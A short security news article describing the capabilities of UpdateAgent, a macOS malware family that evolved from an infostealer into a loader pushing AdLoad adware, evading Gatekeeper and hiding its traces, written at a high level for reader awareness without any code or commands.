UpdateAgent, a macOS malware, was discovered propagating for a year. Researchers said that the malware started infecting macOS users a few years ago as a standard infostealer malware and nothing more. Unfortunately, the malware has been busy upgrading itself since its operators are non-stop developing its features.
According to researchers, UpdateAgent has new functionalities never seen in an ordinary infostealer and has evolved past an infostealer and become a severe malware threat. The malware now obtained functionalities, including pushing AdLoad or aggressive second-stage adware that installs a persistent and hostile backdoor.
In addition, UpdateAgent’s adware injects several advertisements into web pages and search results. It also utilises a person-in-the-middle attack through a web proxy that allows threat actors to steal ad revenue from the official website owners.
The malware also has a feature that sends back a heartbeat signaling system to inform the criminal operators that UpdateAgent is still fully operational. For the reconnaissance stage, the malware can collect system profile data and SPHardwaretype that discloses the victim system’s serial number.
Researchers said that the UpdateAgent malware could deceive many users since it can spoof legitimate software, such as video games or support agents, and propagates through a hacked or compromised website.
The malware can also exploit Mac devices functionalities and can evade Gatekeeper controls. The Gatekeeper is a security feature that ensures that only trusted and uncompromised applications are installed. Therefore, if the UpdateAgent can bypass Gatekeeper’s function, it will be detrimental to macOS users.
It can also abuse existing user permissions to operate malicious activities and delete their traces and evidence.
Lastly, UpdateAgent can abuse public cloud infrastructure to host additional payloads.
The UpdateAgent malware showed everyone that a simple infostealer malware could be a severe threat if given enough time to propagate. Thus, cybersecurity researchers will need to identify and learn more about malicious entities such as this malware.
